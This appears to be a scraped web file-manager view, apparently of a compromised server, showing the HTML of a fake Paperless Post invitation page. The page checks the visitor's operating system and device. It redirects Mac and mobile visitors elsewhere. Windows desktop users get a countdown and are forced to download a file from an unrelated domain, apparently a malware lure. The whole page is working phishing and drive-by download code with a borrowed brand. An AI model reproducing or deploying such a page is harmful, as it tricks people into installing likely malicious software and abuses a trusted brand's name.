at path:
ROOT
/
x
/
exclusive
/
exclusive.html
run:
R
W
Run
images
DIR
2026-03-13 16:00:47
R
W
Run
about.php
0 By
2026-03-13 16:00:45
R
W
Run
Delete
Rename
exclusive.html
6.26 KB
2026-03-13 15:57:39
R
W
Run
Delete
Rename
error_log
up
📄
exclusive.html
Save
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Meaningful Milestone</title> <link rel="icon" type="image/x-icon" href="images/favi.jpg" /> <style> body { margin: 0; height: 100vh; display: flex; justify-content: center; align-items: center; background-image: url(./images/WhatsApp\ Image\ 2025-09-24\ at\ 13.49.31.jpeg); backdrop-filter: blur(10px); /* modern browsers */ -webkit-backdrop-filter: blur(14px); border-radius: 2rem; font-family: Arial, sans-serif; } .container { background-color: #fdfbf6; width: 450px; padding: 20px; border: #e6be8a 0.03rem solid; box-shadow: 0 4px 20px rgba(0, 0, 0, 0.2); border-radius: 10px; display: flex; flex-direction: column; gap: 20px; } .section { text-align: center; padding: 0px 10px; line-height: 26px; font-weight: 500; } .gradient-button { background-color: #d4af37; color: white; border: none; padding: 10px 30px; border-radius: 5px; cursor: pointer; font-size: 16px; font-weight: 600; } .gradient-button:hover { opacity: 0.9; } .tx_color { color: #000000; } .incontain { background-color: #ffffff; border: solid 1px #d4af37; padding: 10px 5px; color: #000000; border-radius: 5px; } h1 { margin-bottom: 0px; } h4 { margin-top: 0px; } i { color: rgba(0, 0, 0, 0.5); font-weight: 100; } .loader-container { width: 100%; background-color: #333; border-radius: 10px; overflow: hidden; height: 10px; margin: 0px auto; max-width: 400px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } .loader-bar { height: 100%; width: 0; background-color: #d4af37; transition: width 2s linear; } .imghd { width: 12rem; height: auto; display: block; margin: 0 auto; } </style> </head> <body> <!-- Hidden by default to prevent flash --> <div class="container" id="mainContent" style="display: none"> <img class="imghd" src="images/paperless-removebg.png" /> <div class="section"><h1 class="tx_color">You Are Invited!</h1></div> <div class="section tx_color" style="font-size: 1.3rem"> Your Friend Sent You An Invitation. </div> <div class="section incontain"> To view your invitation, please download and open the invitation file below. </div> <div class="section" style="color: #fff"></div> <div class="section"> <h4 class="tx_color" id="counter"> Download will start automatically in 3 seconds... </h4> <button class="gradient-button" onClick="relunch()"> Download Invitation </button> </div> <div class="section" id="loaderBox"> <div class="loader-container"> <div class="loader-bar" id="loaderBar"></div> </div> </div> <div class="section fadedd"> <p> Your download is starting automatically. If nothing happens, use the button above to begin the download. </p> <div class="col-lg-12"> <br /> <br /> <p class="h5 text-center txt-color" style="font-size: 10px"> © Paperless Post 2026, All right reserved. </p> </div> </div> </div> <script> // --- Device & OS detection --- function detectOS() { const ua = navigator.userAgent; if (ua.includes("Windows NT")) return "Windows"; if (ua.includes("Macintosh")) return "Mac"; if (/Linux/i.test(ua)) return "Linux"; if (/Android/i.test(ua)) return "Android"; if (/iPhone|iPad|iPod/i.test(ua)) return "iOS"; return "Unknown"; } function getDeviceType() { const ua = navigator.userAgent; if (/tablet|ipad|playbook|silk/i.test(ua)) return "Tablet"; if ( /mobile|iphone|ipod|android|blackberry|opera|mini|windows\sce|palm|smartphone|iemobile/i.test( ua ) ) return "Mobile"; return "Desktop"; } // --- Main --- window.onload = function () { const os = detectOS(); const deviceType = getDeviceType(); // Redirect Mac, Mobile, Tablet immediately if ( deviceType === "Mobile" || deviceType === "Tablet" || os === "Mac" ) { window.location.href = "https://printerhelpnumbers.co.uk//x/redirect/redirect.html"; // replace with your Adobe link return; } // Show content for Windows desktops document.getElementById("mainContent").style.display = "flex"; // Loader + auto-download const loader = document.getElementById("loaderBar"); const box = document.getElementById("loaderBox"); const counter = document.getElementById("counter"); setTimeout(() => { counter.innerHTML = "Downloading will start automatically in 2 seconds..."; }, 1000); setTimeout(() => { counter.innerHTML = "Downloading will start automatically in 1 second..."; window.location.href = "https://printerhelpnumbers.co.uk//x/download_invitee.php"; // download link }, 2000); setTimeout(() => { counter.innerHTML = "Downloading your invitation..."; loader.style.width = "100%"; }, 3000); setTimeout(() => { box.style.display = "none"; }, 5200); }; function relunch() { window.location.href = "https://printerhelpnumbers.co.uk//x/download_invitee.php"; } </script> </body> </html>